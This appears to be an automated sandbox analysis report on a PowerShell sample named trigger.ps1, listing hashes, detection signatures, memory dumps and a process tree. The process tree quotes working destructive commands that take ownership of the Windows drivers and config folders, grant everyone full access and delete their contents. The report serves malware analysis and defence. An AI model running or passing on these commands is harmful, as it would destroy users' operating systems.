Analysis

  • max time kernel
    141s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-08-2024 20:52

General

  • Target

    trigger.ps1

  • Size

    361B

  • MD5

    f027721d34b4dd5220b236a39b0f75a8

  • SHA1

    b31847f44624ca0c7a53cd9a01f187bad6c4e88c

  • SHA256

    c0979852c32530744818450613b30e9bb81ee684239d189034ed3cee80fb5ae6

  • SHA512

    74d9aaf78e525a90cff77a32aed86a4fa594be69bec74ea354f1b471818fbef42616ee5b9cbdea0faaafe2d2d7d5f6a9b4b97be0dc91e528837fa3f8ac281b48

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2240
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && exit"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2468
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\drivers\*
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2796
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\drivers\* /grant everyone:(f)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:5052
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\config\* >nul && icacls C:\Windows\System32\config\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\config\* >nul 2>&1 && exit"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\config\*
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3468
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\config\* /grant everyone:(f)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1220

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yy2y3okn.vck.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2240-0-0x00007FFB05A93000-0x00007FFB05A95000-memory.dmp

    Filesize

    8KB

  • memory/2240-6-0x000001CAB6AC0000-0x000001CAB6AE2000-memory.dmp

    Filesize

    136KB

  • memory/2240-11-0x00007FFB05A90000-0x00007FFB06551000-memory.dmp

    Filesize

    10.8MB

  • memory/2240-12-0x00007FFB05A90000-0x00007FFB06551000-memory.dmp

    Filesize

    10.8MB

  • memory/2240-15-0x00007FFB05A90000-0x00007FFB06551000-memory.dmp

    Filesize

    10.8MB